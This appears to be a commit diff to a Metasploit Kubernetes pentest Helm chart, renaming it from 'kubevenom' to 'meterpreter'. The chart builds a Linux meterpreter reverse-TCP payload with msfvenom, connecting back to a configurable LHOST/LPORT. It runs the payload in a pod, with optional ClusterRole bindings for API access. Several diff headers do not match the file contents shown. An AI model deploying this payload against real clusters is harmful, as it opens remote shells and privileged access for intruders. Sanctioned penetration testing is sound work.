naming - go meterpreter

Author: gadinaor-r7

kubernetes/.gitignore

@@ -1,3 +1,3 @@
 metasploit/charts
 metasploit.yaml
-kubevenom.yaml
+meterpreter.yaml

kubernetes/Makefile

@@ -5,16 +5,16 @@
 .SECONDEXPANSION:
 
 lint-charts: ##@Lint Lint Helm Chart
-	helm lint kubevenom    
+	helm lint meterpreter    
 
-generate-deployment:	##@Generate Generate K8S installation
-	helm template kubevenom kubevenom --set lport="4444" --set lhost="1.1.1.1" > kubevenom.yaml   
+generate-deployment:	##@Generate Generate YAML based deployment
+	helm template meterpreter meterpreter --set lport="4444" --set lhost="1.1.1.1" > meterpreter.yaml   
 
-install-kubevenom: ##@kubevenom Install kubevenom chart
-	helm upgrade --create-namespace -i -n metasploit kubevenom ./kubevenom
+install-meterpreter: ##@meterpreter Install meterpreter chart
+	helm upgrade --create-namespace -i -n metasploit meterpreter ./meterpreter
 
-delete-kubevenom: ##@kubevenom Delete kubevenom chart    
-	helm -n metasploit delete kubevenom    
+delete-meterpreter: ##@meterpreter Delete meterpreter chart    
+	helm -n metasploit delete meterpreter    
 
 
 create-kind-cluster:  ##@Test create KIND cluster

kubernetes/README.md

@@ -3,7 +3,7 @@
 
 Running metasploit framework against Kubernetes enables pentesters to security test cluster components such as the API Server, as well as internal application components or micro-services.
 
-The installation chart (kubevenom) also offers to install & run a metasploit payload, that connects back to metasploit console.
+The installation chart (meterpreter) also offers to install & run a metasploit payload, that connects back to metasploit console.
 The payload can be deployed with different priviliges and permissions with respect to Kubernetes node hosting metasploit payload, as well as Kubernetes API server itself - see 'priviliges' section under values.yaml
 
 ```yaml
@@ -37,10 +37,10 @@ priviliges:
 2. Make sure you have an available Kubernetes cluster to deploy metasploit. You can install a local Kubernetes cluster using [KIND](https://kind.sigs.k8s.io/docs/user/quick-start/#installation)
     > You can create local KIND cluster by running  `make create-kind-cluster`
 
-3. Install kubevenom helm chart by running:
+3. Install meterpreter helm chart by running:
 
 ```sh
 export MSF_PORT="<routeable port from inside cluster>"
 export MSF_IPADDRESS="<routeable ip from inside cluster>"
-helm upgrade --create-namespace -i -n metasploit kubevenom ./kubevenom --set lport=$MSF_PORT --set lhost=$MSF_IPADDRESS
+helm upgrade --create-namespace -i -n metasploit meterpreter ./meterpreter --set lport=$MSF_PORT --set lhost=$MSF_IPADDRESS
 ```

kubernetes/kubevenom/templates/NOTES.txt

@@ -1,11 +1,11 @@
 apiVersion: v2
-name: kubevenom
+name: meterpreter
 description: A Helm chart for deploying metasploit payload into Kubernetes
 type: application
 version: 0.1.0
 keywords:
   - metasploit
-  - meterperter
+  - meterpreter
   - security
   - pentest
   - penetration testing

kubernetes/kubevenom/templates/configmap.yaml

@@ -0,0 +1 @@
+Make sure meterpreter connected to your Metasploit Receive Handler running at {{ .Values.lhost}}:{{.Values.lport}}

kubernetes/kubevenom/.helmignore renamed to kubernetes/meterpreter/.helmignore

@@ -2,7 +2,7 @@
 {{/*
 Expand the name of the chart.
 */}}
-{{- define "kubevenom.name" -}}
+{{- define "meterpreter.name" -}}
 {{- default .Chart.Name .Values.nameOverride | trunc 63 | trimSuffix "-" -}}
 {{- end -}}
 
@@ -11,7 +11,7 @@ Create a default fully qualified app name.
 We truncate at 63 chars because some Kubernetes name fields are limited to this (by the DNS naming spec).
 If release name contains chart name it will be used as a full name.
 */}}
-{{- define "kubevenom.fullname" -}}
+{{- define "meterpreter.fullname" -}}
 {{- if .Values.fullnameOverride -}}
 {{- .Values.fullnameOverride | trunc 63 | trimSuffix "-" -}}
 {{- else -}}
@@ -27,16 +27,16 @@ If release name contains chart name it will be used as a full name.
 {{/*
 Create chart name and version as used by the chart label.
 */}}
-{{- define "kubevenom.chart" -}}
+{{- define "meterpreter.chart" -}}
 {{- printf "%s-%s" .Chart.Name .Chart.Version | replace "+" "_" | trunc 63 | trimSuffix "-" -}}
 {{- end -}}
 
 {{/*
 Common labels
 */}}
-{{- define "kubevenom.labels" -}}
-helm.sh/chart: {{ include "kubevenom.chart" . }}
-{{ include "kubevenom.selectorLabels" . }}
+{{- define "meterpreter.labels" -}}
+helm.sh/chart: {{ include "meterpreter.chart" . }}
+{{ include "meterpreter.selectorLabels" . }}
 {{- if .Chart.AppVersion }}
 app.kubernetes.io/version: {{ .Chart.AppVersion | quote }}
 {{- end }}
@@ -46,7 +46,7 @@ app.kubernetes.io/managed-by: {{ .Release.Service }}
 {{/*
 Selector labels
 */}}
-{{- define "kubevenom.selectorLabels" -}}
-app.kubernetes.io/name: {{ include "kubevenom.name" . }}
+{{- define "meterpreter.selectorLabels" -}}
+app.kubernetes.io/name: {{ include "meterpreter.name" . }}
 app.kubernetes.io/instance: {{ .Release.Name }}
 {{- end -}}

kubernetes/kubevenom/Chart.yaml renamed to kubernetes/meterpreter/Chart.yaml

@@ -0,0 +1,15 @@
+apiVersion: v1
+kind: ConfigMap
+metadata:
+  name: {{ include "meterpreter.fullname" . }}
+  labels:
+    {{- include "meterpreter.labels" . | nindent 4 }}
+data:
+  meterpreter.sh: |-
+    #!/bin/bash -x
+
+    env
+    pwd
+    ./msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT -f elf > /meterpreter/meterpreter
+    chmod +x /meterpreter/meterpreter
+    ls -la /meterpreter/meterpreter

kubernetes/meterpreter/templates/NOTES.txt

@@ -1,25 +1,25 @@
 apiVersion: apps/v1
 kind: Deployment
 metadata:
-  name: {{ include "kubevenom.fullname" . }}
+  name: {{ include "meterpreter.fullname" . }}
   labels:
-    {{- include "kubevenom.labels" . | nindent 4 }}
+    {{- include "meterpreter.labels" . | nindent 4 }}
 spec:
   replicas: 1
   selector:
     matchLabels:
-      {{- include "kubevenom.selectorLabels" . | nindent 6 }}
+      {{- include "meterpreter.selectorLabels" . | nindent 6 }}
   template:
     metadata:
       labels:
-        {{- include "kubevenom.selectorLabels" . | nindent 8 }}
+        {{- include "meterpreter.selectorLabels" . | nindent 8 }}
     spec:
     {{- with .Values.imagePullSecrets }}
       imagePullSecrets:
         {{- toYaml . | nindent 8 }}
     {{- end }}
       {{- if .Values.priviliges.useServiceAccount }}
-      serviceAccountName: {{ include "kubevenom.fullname" . }}
+      serviceAccountName: {{ include "meterpreter.fullname" . }}
       {{ else }}
       automountServiceAccountToken: false
       {{ end }}
@@ -29,24 +29,24 @@ spec:
         - name: msfvenome
           image: "{{ .Values.image.repository}}:{{ .Values.image.tag }}"
           imagePullPolicy: {{ .Values.image.pullPolicy }}        
-          command: ["/bin/bash", "-c", "/tmp/kubevenom.sh"]
+          command: ["/bin/bash", "-c", "/tmp/meterpreter.sh"]
           env:
             - name: LHOST
               value: "{{ required "Please provide value to 'lhost' - The IP Address the payload will connect to" .Values.lhost }}"
             - name: LPORT
               value: "{{ required "Please provide value to 'lport' - The Port the payload will connect to" .Values.lport }}"
           volumeMounts:
-            - name: kubevenom
-              mountPath: /kubevenom
+            - name: meterpreter
+              mountPath: /meterpreter
             - name: msfvenome
-              mountPath: /tmp/kubevenom.sh
-              subPath: kubevenom.sh
+              mountPath: /tmp/meterpreter.sh
+              subPath: meterpreter.sh
 
       containers:
         - name: {{ .Chart.Name }}
           image: gcr.io/google_containers/pause-amd64:3.0
           imagePullPolicy: {{ .Values.image.pullPolicy }}        
-          command: ["/kubevenom/kubevenom"]
+          command: ["/meterpreter/meterpreter"]
           tty: true
           stdin: true
           securityContext:
@@ -55,19 +55,19 @@ spec:
           resources:
             {{- toYaml .Values.resources | nindent 12 }}
           volumeMounts:
-            - name: kubevenom
-              mountPath: /kubevenom
+            - name: meterpreter
+              mountPath: /meterpreter
 
       restartPolicy: Always
       volumes:
-        - name: kubevenom
+        - name: meterpreter
           emptyDir: {}
         - name: msfvenome
           configMap:
-            name: {{ include "kubevenom.fullname" . }}
+            name: {{ include "meterpreter.fullname" . }}
             items:
-            - key: kubevenom.sh
-              path: kubevenom.sh
+            - key: meterpreter.sh
+              path: meterpreter.sh
             defaultMode: 0777
 
 

kubernetes/kubevenom/templates/_helpers.tpl renamed to kubernetes/meterpreter/templates/_helpers.tpl

@@ -2,25 +2,25 @@
 apiVersion: v1
 kind: ServiceAccount
 metadata:
-  name: {{ include "kubevenom.fullname" . }}
+  name: {{ include "meterpreter.fullname" . }}
   labels:
-    {{- include "kubevenom.labels" . | nindent 4 }}
+    {{- include "meterpreter.labels" . | nindent 4 }}
 
 ---
 {{- if ne .Values.priviliges.bindClusterRole "" -}}
 apiVersion: rbac.authorization.k8s.io/v1
 kind: RoleBinding
 metadata:
-  name: {{ include "kubevenom.fullname" . }}
+  name: {{ include "meterpreter.fullname" . }}
   labels:
-    {{- include "kubevenom.labels" . | nindent 4 }}
+    {{- include "meterpreter.labels" . | nindent 4 }}
 roleRef:
   apiGroup: rbac.authorization.k8s.io
   kind: ClusterRole
   name: {{ .Values.priviliges.bindClusterRole }}
 subjects:
   - kind: ServiceAccount
-    name: {{ include "kubevenom.fullname" . }}
+    name: {{ include "meterpreter.fullname" . }}
     namespace: {{ .Release.Namespace }}
 {{- end -}}
 {{- end -}}

kubernetes/meterpreter/templates/configmap.yaml

@@ -1,8 +1,8 @@
-# Default values for kubevenom.
+# Default values for meterpreter.
 
-#"<The IP Address the payload will connect to>"
+#The IP Address the payload will connect to
 lhost: 
-#"<The Port kubevenom meterperter will connect to>"
+#The Port meterpreter will connect to
 lport: 
 
 image:
@@ -14,7 +14,7 @@ imagePullSecrets: []
 nameOverride: ""
 fullnameOverride: ""
 
-# Tune the priviliges your Kubernetes meterperter will run with 
+# Tune the priviliges your Kubernetes meterpreter will run with 
 priviliges:
   # Disable Kubernetes API Server Access - even to the discovery APIs
   useServiceAccount: true